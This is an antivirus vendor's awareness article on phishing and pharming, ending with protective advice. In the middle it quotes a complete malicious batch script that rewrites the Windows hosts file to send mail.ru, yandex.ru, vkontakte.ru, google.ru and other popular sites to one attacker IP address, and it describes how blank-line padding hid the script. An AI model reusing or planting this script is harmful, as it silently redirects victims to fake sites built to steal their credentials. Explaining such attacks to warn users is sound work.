Phishing, pharming fraudsters! Oh my!

Caught

На удочке

add to favourites

Phishing, pharming fraudsters! Oh my!

Read: 16907 Comments: 2 Rating: 43

Tuesday, September 13, 2016

Nowadays most users know about the danger of phishing—a type of cyber fraud that involves sending users email offers for various goods and services. Naturally, as awareness increases, users are adopting a more suspicious approach toward incoming email.

In response, criminals are inventing new tricks designed to get trusting and kind-hearted people to fork over their money.

The Bank of Russia exposed the site Mngb.ru, which was offering services illegally on behalf of a certain Metro Neal Guardian Bank. This organization never received a license to operate on the territory of Russia.

Meanwhile, Mngb.ru claimed that the bank in question was headquartered in Washington DC and provided a fake address for its Russian branch office.

The fraudsters offered to issue MasterCard and Visa bank cards.

Like phishing, pharming schemes involve fraudulent sites, but users aren't even required to click on a link in order to get to them.

Even if a user enters the correct URL, they will be redirected to a bogus site automatically.

To achieve this, fraudsters employ malware, and modify the hosts file and the DNS server settings. Thus an attack can be carried out stealthily and user involvement is minimal. A targeted attack is also possible. Criminals need only to wait until a user decides to visit a certain site.

How hard can it be to lure a user into visiting a bogus site? Here is an example of a trap.

— Hello, I can't open a file containing some important information; can you try to open it on your computer?

— Sure.

...

The unsuspecting user clicks on the file and the following code is executed:

@rem ----- ExeScript Options Begin ----- @rem ScriptType: console @rem DestDirectory: temp @rem Icon: default @rem ----- ExeScript Options End ----- @echo off echo 81.94.229.115 www.mail.i.ua >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 mail.i.ua >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 www.m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 mail.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 www.mail.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 www.yandex.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 yandex.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 www.vkontakte.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 vkontakte.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 www.odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 www.google.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 google.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 www.rambler.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 rambler.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 www.ya.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 ya.ru >> %windir%\system32\drivers\etc\hosts

By the way, 662 empty strings precede the script in the file.

https://habrahabr.ru/post/73515

As a result, instead of all the above-listed sites, the user will land on a bogus site. #phishing #fraudster

The Anti-virus Times recommends

Pharming schemes are hard to identify because the “look and feel” of company sites changes constantly, and users usually don’t monitor these changes. To make sure that you won't be redirected to a bogus site, do the following:

Use the Preventive Protection component of Dr.Web Security Space to select the level of security you desire.
To configure Preventive Protection, click on the icon in the system tray; in the menu that opens up, click and . In the Settings window, select Protection Components and then choose Preventive Protection.
Here you can adjust the anti-virus's responses to the actions of other applications that can result in your computer becoming infected.
Because users often log in under accounts that have administrator privileges, attackers who gain access to their machines can use these privileges to change network settings. Once you’ve configured all your system’s parameters, don’t use an account with administrative privileges.
Regularly check your bank account statement. Online banking is convenient for users as well as for criminals. Banks may notify their clients about every transaction or only those they find to be suspicious, but these notifications can be concealed or spoofed.
Only you know how and where your money has been spent; therefore, don't forget to check your account statements regularly.
Install all the security updates for the operating system and applications you use.
Do not enter confidential information on a site if you navigated to it using an external link or by clicking on a pop-up ad (even if the site appears to be legitimate). Open a new browser window and enter the site's IP address (you can use another device to determine the address) to make sure that the site is not a fake. Make sure that the URL in the address bar is correct before you provide any personal information.
If you receive an email from your bank, online store, a social networking site, or any other company, make sure that the sender address is the official address used by the company. Banks do not use public domains like gmail.com, yahoo.co.uk, etc.
Make sure you destroy financial information you no longer need. People often throw away papers containing online banking data, invoices containing passwords, etc. All media containing personal information, including bank account statements and expired banking cards, should be shredded.
Report incidents of Internet fraud. One way you can do that is by going on Doctor Web's site and sending a request to our support service. Your information is important, not just to us; it can help all users who are being targeted by criminals.